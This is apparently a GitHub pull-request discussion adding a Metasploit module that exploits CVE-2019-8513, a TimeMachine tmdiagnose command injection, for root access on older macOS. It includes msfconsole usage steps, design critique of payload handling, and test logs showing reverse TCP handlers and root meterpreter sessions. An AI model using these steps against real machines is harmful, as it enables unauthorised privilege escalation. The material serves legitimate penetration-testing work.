Add exploit for CVE-2019-8513 (TimeMachine cmd injection)

[timwr]

Initial commit of CVE-2019-8513. Ping @ChiChou

Verification

• Start msfconsole
• Get a (user) session on OSX < 10.14.4
• Run the module:

use exploit/osx/local/timemachine_cmd_injection 
set SESSION -1
set LHOST <tab>
set LPORT 4445
exploit 

• Verify you get a new session as root
• Document the thing and how it works

[timwr]

1. Currently there is an issue with cmd_exec when using osx/x64/meterpreter/reverse_tcp, which causes the exploit not to work on that session type. python meterpreter is working however.
2. The exploit cleanup ejects all drives (so any thumb drives you have attached will be ejected), maybe @ChiChou can help fix this. We know the drive label so it shouldn't be too hard to look that up and eject only that drive.

[bcoles]

I'd like to think this won't be the last command injection LPE in TimeMachine. Perhaps mention tmdiagnose in the title, or something else unique and more applicable.

[bcoles]

This approach is likely problematic in the unlikely event that the payload is larger than 1024. If it is in fact problematic, then it may be difficult to debug, as the cause won't be immediately obvious, due to clobbering adjacent binary data.

This also results in the payload being written to disk, rather than writing the exploit to disk and executing the payload in memory.

Potential alternatives:

• adjusting the exploit to accept a command line argument to execute; or
• adjusting the exploit to spawn a setuid(0,0,0) shell, if feasible, and piping the payload as input through STDIN; or
• lazy option: adding a warning/error to the exploit method in the event that the generated payload is larger than 1024.

[timwr]

It's actually tmdiagnose that calls back and executes our payload (without any arguments) so there is no way to avoid having some kind of payload on disk. (Unless you can think of a way?).
I'll see if I can pipe the python/command payload through stdin and also add a length check.

[bcoles]

🤷 I haven't looked at how the exploit works at all. A closer look reveals the x64 payload obviously can't be piped, unless it's already written to disk, which is less preferable.

Simply adding a length check might be the easiest way.

[busterb]

If you can rebase on master, the Travis issues in this PR are resolved upstream.

[busterb]

Been testing a few versions. 10.11.6 appeared vulnerable but not work:

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Uploading file: '/tmp/.auprhsjdiuv'
[*] Executing exploit '/tmp/.auprhsjdiuv'
[*] Exploit result:
2019-06-29 02:19:08.738 .auprhsjdiuv[483:17255] creating dmg image
2019-06-29 02:19:12.838 .auprhsjdiuv[483:17255] mounting malformed disk
2019-06-29 02:19:14.126 .auprhsjdiuv[483:17255] sending XPC msg
2019-06-29 02:19:14.127 .auprhsjdiuv[483:17255] now wait a few minutes for the root command to run
[*] Exploit completed, but no session was created.

10.13.3 worked great:

meterpreter > sysinfo
Computer     : vagrants-MacBook-Pro.local
OS           : macOS High Sierra (macOS 10.13.3)
Architecture : x86
BuildTuple   : 
Meterpreter  : x64/osx
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

Mojave worked fine too.

[busterb]

Release Notes

A exploit module that targets a command injection vulnerability in TimeMachine on macOS <= 10.14.3 is now available. It will run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 can be exploited by creating a specially crafted disk label.

[busterb]

Thanks @timwr @bcoles and @ChiChou

[ChiChou]

Been testing a few versions. 10.11.6 appeared vulnerable but not work:

10.11.6 is not vulnerable. It only works from Sierra (10.12.x) - Mojave (10.14.3)